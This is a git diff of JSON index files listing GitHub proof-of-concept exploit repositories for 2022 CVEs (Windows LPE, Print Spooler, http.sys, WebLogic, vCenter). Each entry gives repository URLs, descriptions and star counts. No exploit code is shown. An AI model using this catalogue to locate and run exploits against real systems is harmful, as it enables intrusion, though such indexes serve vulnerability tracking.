"description": "👻 [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241)",
|
||||
"fork": false,
|
||||
"created_at": "2021-06-22T01:36:16Z",
|
||||
"updated_at": "2023-01-31T14:35:05Z",
|
||||
"pushed_at": "2022-02-11T13:59:14Z",
|
||||
"stargazers_count": 25,
|
||||
"watchers_count": 25,
|
||||
"has_discussions": false,
|
||||
"forks_count": 8,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [
|
||||
"cybersecurity",
|
||||
"exploit",
|
||||
"poc",
|
||||
"security"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 8,
|
||||
"watchers": 25,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
}
|
||||
]
|
|
@ -1,34 +1,4 @@
|
|||
[
|
||||
{
|
||||
"id": 451918204,
|
||||
"name": "CVE-2022-21371",
|
||||
"full_name": "Mr-xn\/CVE-2022-21371",
|
||||
"owner": {
|
||||
"login": "Mr-xn",
|
||||
"id": 18260135,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18260135?v=4",
|
||||
"html_url": "https:\/\/github.com\/Mr-xn"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/Mr-xn\/CVE-2022-21371",
|
||||
"description": "Oracle WebLogic Server 12.1.3.0.0 \/ 12.2.1.3.0 \/ 12.2.1.4.0 \/ 14.1.1.0.0 Local File Inclusion",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-25T14:50:29Z",
|
||||
"updated_at": "2023-04-20T00:39:59Z",
|
||||
"pushed_at": "2022-01-25T14:52:21Z",
|
||||
"stargazers_count": 27,
|
||||
"watchers_count": 27,
|
||||
"has_discussions": false,
|
||||
"forks_count": 9,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 9,
|
||||
"watchers": 27,
|
||||
"score": 0,
|
||||
"subscribers_count": 3
|
||||
},
|
||||
{
|
||||
"id": 528880899,
|
||||
"name": "Oracle-WebLogic-CVE-2022-21371",
|
||||
|
|
|
@ -1,36 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 450374545,
|
||||
"name": "cve-2022-21658",
|
||||
"full_name": "sagittarius-a\/cve-2022-21658",
|
||||
"owner": {
|
||||
"login": "sagittarius-a",
|
||||
"id": 8809698,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8809698?v=4",
|
||||
"html_url": "https:\/\/github.com\/sagittarius-a"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/sagittarius-a\/cve-2022-21658",
|
||||
"description": "POC for cve-2022-21658",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-21T06:09:16Z",
|
||||
"updated_at": "2022-01-21T06:10:05Z",
|
||||
"pushed_at": "2022-01-21T06:09:29Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [
|
||||
"cve-2022-21658",
|
||||
"poc",
|
||||
"rust"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
}
|
||||
]
|
|
@ -1,34 +1,4 @@
|
|||
[
|
||||
{
|
||||
"id": 446296593,
|
||||
"name": "Gin-Vue-admin-poc-CVE-2022-21660",
|
||||
"full_name": "UzJu\/Gin-Vue-admin-poc-CVE-2022-21660",
|
||||
"owner": {
|
||||
"login": "UzJu",
|
||||
"id": 50813806,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50813806?v=4",
|
||||
"html_url": "https:\/\/github.com\/UzJu"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/UzJu\/Gin-Vue-admin-poc-CVE-2022-21660",
|
||||
"description": "CVE-2022-21660",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-10T05:50:35Z",
|
||||
"updated_at": "2023-08-04T05:22:54Z",
|
||||
"pushed_at": "2022-01-10T05:52:03Z",
|
||||
"stargazers_count": 25,
|
||||
"watchers_count": 25,
|
||||
"has_discussions": false,
|
||||
"forks_count": 2,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 2,
|
||||
"watchers": 25,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 462232980,
|
||||
"name": "CVE-2022-21660",
|
||||
|
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 456710810,
|
||||
"name": "cve-2022-21877",
|
||||
"full_name": "Big5-sec\/cve-2022-21877",
|
||||
"owner": {
|
||||
"login": "Big5-sec",
|
||||
"id": 29749118,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29749118?v=4",
|
||||
"html_url": "https:\/\/github.com\/Big5-sec"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/Big5-sec\/cve-2022-21877",
|
||||
"description": "a demonstration PoC for CVE-2022-21877 (storage spaces controller memory leak)",
|
||||
"fork": false,
|
||||
"created_at": "2022-02-07T23:18:17Z",
|
||||
"updated_at": "2022-03-08T16:15:39Z",
|
||||
"pushed_at": "2022-02-08T22:53:36Z",
|
||||
"stargazers_count": 4,
|
||||
"watchers_count": 4,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 4,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -1,158 +1,4 @@
|
|||
[
|
||||
{
|
||||
"id": 452529582,
|
||||
"name": "CVE-2022-21882",
|
||||
"full_name": "KaLendsi\/CVE-2022-21882",
|
||||
"owner": {
|
||||
"login": "KaLendsi",
|
||||
"id": 68001644,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4",
|
||||
"html_url": "https:\/\/github.com\/KaLendsi"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/KaLendsi\/CVE-2022-21882",
|
||||
"description": "win32k LPE ",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-27T03:44:10Z",
|
||||
"updated_at": "2023-08-04T05:22:57Z",
|
||||
"pushed_at": "2022-01-27T04:18:18Z",
|
||||
"stargazers_count": 455,
|
||||
"watchers_count": 455,
|
||||
"has_discussions": false,
|
||||
"forks_count": 141,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 141,
|
||||
"watchers": 455,
|
||||
"score": 0,
|
||||
"subscribers_count": 14
|
||||
},
|
||||
{
|
||||
"id": 454493738,
|
||||
"name": "CVE-2022-21882",
|
||||
"full_name": "David-Honisch\/CVE-2022-21882",
|
||||
"owner": {
|
||||
"login": "David-Honisch",
|
||||
"id": 35835504,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35835504?v=4",
|
||||
"html_url": "https:\/\/github.com\/David-Honisch"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/David-Honisch\/CVE-2022-21882",
|
||||
"description": "CVE-2022-21882",
|
||||
"fork": false,
|
||||
"created_at": "2022-02-01T17:58:29Z",
|
||||
"updated_at": "2023-03-28T18:22:16Z",
|
||||
"pushed_at": "2022-02-01T18:14:07Z",
|
||||
"stargazers_count": 9,
|
||||
"watchers_count": 9,
|
||||
"has_discussions": false,
|
||||
"forks_count": 7,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 7,
|
||||
"watchers": 9,
|
||||
"score": 0,
|
||||
"subscribers_count": 4
|
||||
},
|
||||
{
|
||||
"id": 455137692,
|
||||
"name": "CVE-2022-21882",
|
||||
"full_name": "L4ys\/CVE-2022-21882",
|
||||
"owner": {
|
||||
"login": "L4ys",
|
||||
"id": 5360374,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5360374?v=4",
|
||||
"html_url": "https:\/\/github.com\/L4ys"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/L4ys\/CVE-2022-21882",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-02-03T11:25:14Z",
|
||||
"updated_at": "2023-08-23T18:41:44Z",
|
||||
"pushed_at": "2022-02-04T02:20:47Z",
|
||||
"stargazers_count": 190,
|
||||
"watchers_count": 190,
|
||||
"has_discussions": false,
|
||||
"forks_count": 52,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 52,
|
||||
"watchers": 190,
|
||||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
{
|
||||
"id": 456348360,
|
||||
"name": "cve-2022-21882-poc",
|
||||
"full_name": "sailay1996\/cve-2022-21882-poc",
|
||||
"owner": {
|
||||
"login": "sailay1996",
|
||||
"id": 16739401,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16739401?v=4",
|
||||
"html_url": "https:\/\/github.com\/sailay1996"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/sailay1996\/cve-2022-21882-poc",
|
||||
"description": "lpe poc for cve-2022-21882 ",
|
||||
"fork": false,
|
||||
"created_at": "2022-02-07T03:45:36Z",
|
||||
"updated_at": "2023-07-19T05:14:40Z",
|
||||
"pushed_at": "2022-02-07T03:49:37Z",
|
||||
"stargazers_count": 48,
|
||||
"watchers_count": 48,
|
||||
"has_discussions": false,
|
||||
"forks_count": 23,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [
|
||||
"cve-2022-21882",
|
||||
"privilege-escalation",
|
||||
"windows-exploitation"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 23,
|
||||
"watchers": 48,
|
||||
"score": 0,
|
||||
"subscribers_count": 3
|
||||
},
|
||||
{
|
||||
"id": 459331281,
|
||||
"name": "CVE-2022-21882",
|
||||
"full_name": "r1l4-i3pur1l4\/CVE-2022-21882",
|
||||
"owner": {
|
||||
"login": "r1l4-i3pur1l4",
|
||||
"id": 76409019,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76409019?v=4",
|
||||
"html_url": "https:\/\/github.com\/r1l4-i3pur1l4"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/r1l4-i3pur1l4\/CVE-2022-21882",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-02-14T21:28:15Z",
|
||||
"updated_at": "2023-03-28T13:32:53Z",
|
||||
"pushed_at": "2022-02-15T08:29:26Z",
|
||||
"stargazers_count": 6,
|
||||
"watchers_count": 6,
|
||||
"has_discussions": false,
|
||||
"forks_count": 2,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 2,
|
||||
"watchers": 6,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 630777901,
|
||||
"name": "CVE-2022-21882",
|
||||
|
|
|
@ -1,34 +1,4 @@
|
|||
[
|
||||
{
|
||||
"id": 446683592,
|
||||
"name": "cve-2022-21907",
|
||||
"full_name": "corelight\/cve-2022-21907",
|
||||
"owner": {
|
||||
"login": "corelight",
|
||||
"id": 21672558,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4",
|
||||
"html_url": "https:\/\/github.com\/corelight"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/corelight\/cve-2022-21907",
|
||||
"description": "cve-2022-21907",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-11T05:00:55Z",
|
||||
"updated_at": "2022-03-21T07:03:34Z",
|
||||
"pushed_at": "2022-01-26T20:31:22Z",
|
||||
"stargazers_count": 4,
|
||||
"watchers_count": 4,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 4,
|
||||
"score": 0,
|
||||
"subscribers_count": 7
|
||||
},
|
||||
{
|
||||
"id": 448387955,
|
||||
"name": "CVE-2022-21907",
|
||||
|
@ -79,66 +49,6 @@
|
|||
"score": 0,
|
||||
"subscribers_count": 3
|
||||
},
|
||||
{
|
||||
"id": 448729790,
|
||||
"name": "CVE-2022-21907",
|
||||
"full_name": "ZZ-SOCMAP\/CVE-2022-21907",
|
||||
"owner": {
|
||||
"login": "ZZ-SOCMAP",
|
||||
"id": 98105412,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98105412?v=4",
|
||||
"html_url": "https:\/\/github.com\/ZZ-SOCMAP"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/ZZ-SOCMAP\/CVE-2022-21907",
|
||||
"description": "HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-17T02:28:50Z",
|
||||
"updated_at": "2023-07-28T09:02:24Z",
|
||||
"pushed_at": "2022-01-20T02:07:59Z",
|
||||
"stargazers_count": 366,
|
||||
"watchers_count": 366,
|
||||
"has_discussions": false,
|
||||
"forks_count": 98,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 98,
|
||||
"watchers": 366,
|
||||
"score": 0,
|
||||
"subscribers_count": 10
|
||||
},
|
||||
{
|
||||
"id": 448909871,
|
||||
"name": "CVE-2022-21907",
|
||||
"full_name": "xiska62314\/CVE-2022-21907",
|
||||
"owner": {
|
||||
"login": "xiska62314",
|
||||
"id": 97891523,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97891523?v=4",
|
||||
"html_url": "https:\/\/github.com\/xiska62314"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/xiska62314\/CVE-2022-21907",
|
||||
"description": "CVE-2022-21907",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-17T13:42:44Z",
|
||||
"updated_at": "2022-01-17T13:42:44Z",
|
||||
"pushed_at": "2022-01-17T13:42:45Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 448952968,
|
||||
"name": "CVE-2022-21907-http.sys",
|
||||
|
@ -176,36 +86,6 @@
|
|||
"score": 0,
|
||||
"subscribers_count": 6
|
||||
},
|
||||
{
|
||||
"id": 451128086,
|
||||
"name": "CVE-2022-21907-Vulnerability-PoC",
|
||||
"full_name": "michelep\/CVE-2022-21907-Vulnerability-PoC",
|
||||
"owner": {
|
||||
"login": "michelep",
|
||||
"id": 1425559,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1425559?v=4",
|
||||
"html_url": "https:\/\/github.com\/michelep"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/michelep\/CVE-2022-21907-Vulnerability-PoC",
|
||||
"description": "CVE-2022-21907 Vulnerability PoC",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-23T14:25:12Z",
|
||||
"updated_at": "2023-07-10T03:49:50Z",
|
||||
"pushed_at": "2022-01-23T14:28:54Z",
|
||||
"stargazers_count": 20,
|
||||
"watchers_count": 20,
|
||||
"has_discussions": false,
|
||||
"forks_count": 12,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 12,
|
||||
"watchers": 20,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
},
|
||||
{
|
||||
"id": 477659433,
|
||||
"name": "CVE-2022-21907",
|
||||
|
|
|
@ -1,35 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 457033886,
|
||||
"name": "SpoolFool",
|
||||
"full_name": "ly4k\/SpoolFool",
|
||||
"owner": {
|
||||
"login": "ly4k",
|
||||
"id": 53348818,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4",
|
||||
"html_url": "https:\/\/github.com\/ly4k"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/ly4k\/SpoolFool",
|
||||
"description": "Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)",
|
||||
"fork": false,
|
||||
"created_at": "2022-02-08T17:25:44Z",
|
||||
"updated_at": "2023-08-18T15:06:18Z",
|
||||
"pushed_at": "2022-02-09T16:54:09Z",
|
||||
"stargazers_count": 719,
|
||||
"watchers_count": 719,
|
||||
"has_discussions": false,
|
||||
"forks_count": 155,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [
|
||||
"cve-2022-21999",
|
||||
"cve-2022-22718"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 155,
|
||||
"watchers": 719,
|
||||
"score": 0,
|
||||
"subscribers_count": 16
|
||||
}
|
||||
]
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 450430110,
|
||||
"name": "CVE-2022-22296",
|
||||
"full_name": "vlakhani28\/CVE-2022-22296",
|
||||
"owner": {
|
||||
"login": "vlakhani28",
|
||||
"id": 42069316,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42069316?v=4",
|
||||
"html_url": "https:\/\/github.com\/vlakhani28"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/vlakhani28\/CVE-2022-22296",
|
||||
"description": "All Details about CVE-2022-22296",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-21T09:29:21Z",
|
||||
"updated_at": "2022-10-02T03:41:44Z",
|
||||
"pushed_at": "2022-01-21T09:45:29Z",
|
||||
"stargazers_count": 1,
|
||||
"watchers_count": 1,
|
||||
"has_discussions": false,
|
||||
"forks_count": 3,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 3,
|
||||
"watchers": 1,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
}
|
||||
]
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 452487266,
|
||||
"name": "CVE-2022-22828",
|
||||
"full_name": "videnlabs\/CVE-2022-22828",
|
||||
"owner": {
|
||||
"login": "videnlabs",
|
||||
"id": 97770137,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97770137?v=4",
|
||||
"html_url": "https:\/\/github.com\/videnlabs"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/videnlabs\/CVE-2022-22828",
|
||||
"description": "Write-up of CVE-2022-22828",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-27T00:29:47Z",
|
||||
"updated_at": "2022-01-27T01:53:47Z",
|
||||
"pushed_at": "2022-01-27T01:32:25Z",
|
||||
"stargazers_count": 0,
|
||||
"watchers_count": 0,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 0,
|
||||
"score": 0,
|
||||
"subscribers_count": 0
|
||||
}
|
||||
]
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 451154958,
|
||||
"name": "CVE-2022-22850",
|
||||
"full_name": "Sant268\/CVE-2022-22850",
|
||||
"owner": {
|
||||
"login": "Sant268",
|
||||
"id": 26564273,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4",
|
||||
"html_url": "https:\/\/github.com\/Sant268"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22850",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-23T16:00:34Z",
|
||||
"updated_at": "2022-01-24T06:20:46Z",
|
||||
"pushed_at": "2022-01-27T02:37:34Z",
|
||||
"stargazers_count": 1,
|
||||
"watchers_count": 1,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 1,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 451155234,
|
||||
"name": "CVE-2022-22851",
|
||||
"full_name": "Sant268\/CVE-2022-22851",
|
||||
"owner": {
|
||||
"login": "Sant268",
|
||||
"id": 26564273,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4",
|
||||
"html_url": "https:\/\/github.com\/Sant268"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22851",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-23T16:01:26Z",
|
||||
"updated_at": "2022-01-24T06:20:47Z",
|
||||
"pushed_at": "2022-01-27T03:04:39Z",
|
||||
"stargazers_count": 1,
|
||||
"watchers_count": 1,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 1,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -1,32 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 451155350,
|
||||
"name": "CVE-2022-22852",
|
||||
"full_name": "Sant268\/CVE-2022-22852",
|
||||
"owner": {
|
||||
"login": "Sant268",
|
||||
"id": 26564273,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26564273?v=4",
|
||||
"html_url": "https:\/\/github.com\/Sant268"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/Sant268\/CVE-2022-22852",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-23T16:01:49Z",
|
||||
"updated_at": "2022-01-24T06:20:48Z",
|
||||
"pushed_at": "2022-01-27T03:04:11Z",
|
||||
"stargazers_count": 1,
|
||||
"watchers_count": 1,
|
||||
"has_discussions": false,
|
||||
"forks_count": 0,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 0,
|
||||
"watchers": 1,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
}
|
||||
]
|
|
@ -766,10 +766,10 @@
|
|||
"description": "一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005、One Access的CVE-2022-22954、CVE-2022-22972\/31656以及log4j,提供一键上传webshell,命令执行或者上传公钥使用SSH免密连接",
|
||||
"fork": false,
|
||||
"created_at": "2022-10-04T03:39:27Z",
|
||||
"updated_at": "2023-08-24T03:37:41Z",
|
||||
"updated_at": "2023-08-24T13:39:58Z",
|
||||
"pushed_at": "2023-05-14T12:08:39Z",
|
||||
"stargazers_count": 1055,
|
||||
"watchers_count": 1055,
|
||||
"stargazers_count": 1057,
|
||||
"watchers_count": 1057,
|
||||
"has_discussions": false,
|
||||
"forks_count": 131,
|
||||
"allow_forking": true,
|
||||
|
@ -785,7 +785,7 @@
|
|||
],
|
||||
"visibility": "public",
|
||||
"forks": 131,
|
||||
"watchers": 1055,
|
||||
"watchers": 1057,
|
||||
"score": 0,
|
||||
"subscribers_count": 10
|
||||
},
|
||||
|
|
|
@ -1,64 +1,4 @@
|
|||
[
|
||||
{
|
||||
"id": 450827017,
|
||||
"name": "CVE-2022-23046",
|
||||
"full_name": "jcarabantes\/CVE-2022-23046",
|
||||
"owner": {
|
||||
"login": "jcarabantes",
|
||||
"id": 9590425,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9590425?v=4",
|
||||
"html_url": "https:\/\/github.com\/jcarabantes"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/jcarabantes\/CVE-2022-23046",
|
||||
"description": null,
|
||||
"fork": false,
|
||||
"created_at": "2022-01-22T13:35:40Z",
|
||||
"updated_at": "2022-02-16T08:00:53Z",
|
||||
"pushed_at": "2022-01-24T17:29:09Z",
|
||||
"stargazers_count": 1,
|
||||
"watchers_count": 1,
|
||||
"has_discussions": false,
|
||||
"forks_count": 1,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 1,
|
||||
"watchers": 1,
|
||||
"score": 0,
|
||||
"subscribers_count": 2
|
||||
},
|
||||
{
|
||||
"id": 459366538,
|
||||
"name": "CVE-2022-23046",
|
||||
"full_name": "dnr6419\/CVE-2022-23046",
|
||||
"owner": {
|
||||
"login": "dnr6419",
|
||||
"id": 43310843,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4",
|
||||
"html_url": "https:\/\/github.com\/dnr6419"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/dnr6419\/CVE-2022-23046",
|
||||
"description": "SQL Injection Vulnerability on PhpIPAM v1.4.4",
|
||||
"fork": false,
|
||||
"created_at": "2022-02-15T00:00:22Z",
|
||||
"updated_at": "2023-01-22T10:15:22Z",
|
||||
"pushed_at": "2022-02-15T00:25:16Z",
|
||||
"stargazers_count": 4,
|
||||
"watchers_count": 4,
|
||||
"has_discussions": false,
|
||||
"forks_count": 3,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [],
|
||||
"visibility": "public",
|
||||
"forks": 3,
|
||||
"watchers": 4,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 485887908,
|
||||
"name": "phpipam_1.4.4",
|
||||
|
|
|
@ -48,38 +48,6 @@
|
|||
"score": 0,
|
||||
"subscribers_count": 5
|
||||
},
|
||||
{
|
||||
"id": 450360735,
|
||||
"name": "CVE-2022-RCE",
|
||||
"full_name": "AlphabugX\/CVE-2022-RCE",
|
||||
"owner": {
|
||||
"login": "AlphabugX",
|
||||
"id": 27001865,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27001865?v=4",
|
||||
"html_url": "https:\/\/github.com\/AlphabugX"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/AlphabugX\/CVE-2022-RCE",
|
||||
"description": "test 反向辣鸡数据投放 CVE-2022-23305 工具 利用 教程 Exploit POC ",
|
||||
"fork": false,
|
||||
"created_at": "2022-01-21T05:07:59Z",
|
||||
"updated_at": "2022-11-05T22:58:02Z",
|
||||
"pushed_at": "2022-01-21T05:21:25Z",
|
||||
"stargazers_count": 5,
|
||||
"watchers_count": 5,
|
||||
"has_discussions": false,
|
||||
"forks_count": 2,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [
|
||||
"cve-2020-"
|
||||
],
|
||||
"visibility": "public",
|
||||
"forks": 2,
|
||||
"watchers": 5,
|
||||
"score": 0,
|
||||
"subscribers_count": 1
|
||||
},
|
||||
{
|
||||
"id": 670307374,
|
||||
"name": "CVE-2022-23305_POC",
|
||||
|
|
|
@ -1,50 +0,0 @@
|
|||
[
|
||||
{
|
||||
"id": 454474679,
|
||||
"name": "CVE-2022-23808",
|
||||
"full_name": "dipakpanchal456\/CVE-2022-23808",
|
||||
"owner": {
|
||||
"login": "dipakpanchal456",
|
||||
"id": 31427462,
|
||||
"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31427462?v=4",
|
||||
"html_url": "https:\/\/github.com\/dipakpanchal456"
|
||||
},
|
||||
"html_url": "https:\/\/github.com\/dipakpanchal456\/CVE-2022-23808",
|
||||
"description": "phpMyAdmin XSS ",
|
||||
"fork": false,
|
||||
"created_at": "2022-02-01T17:02:03Z",
|
||||
"updated_at": "2023-08-08T15:53:15Z",
|
||||
"pushed_at": "2022-02-03T16:21:01Z",
|
||||
"stargazers_count": 109,
|
||||
"watchers_count": 109,
|
||||
"has_discussions": false,
|
||||
"forks_count": 23,
|
||||
"allow_forking": true,
|
||||
"is_template": false,
|
||||
"web_commit_signoff_required": false,
|
||||
"topics": [
|
||||
"bugbounty",
|
||||
"cross-site-scripting",
|
||||
"database",
|
||||
"exploit",
|
||||
"exploitation",
|
||||
"hacking",
|
||||
"infosec",
|
||||
"owasp",
|
||||
"owasp-top-10",
|
||||
"pentesting",
|
||||
"phpmyadmin",
|
||||
"poc",
|
||||
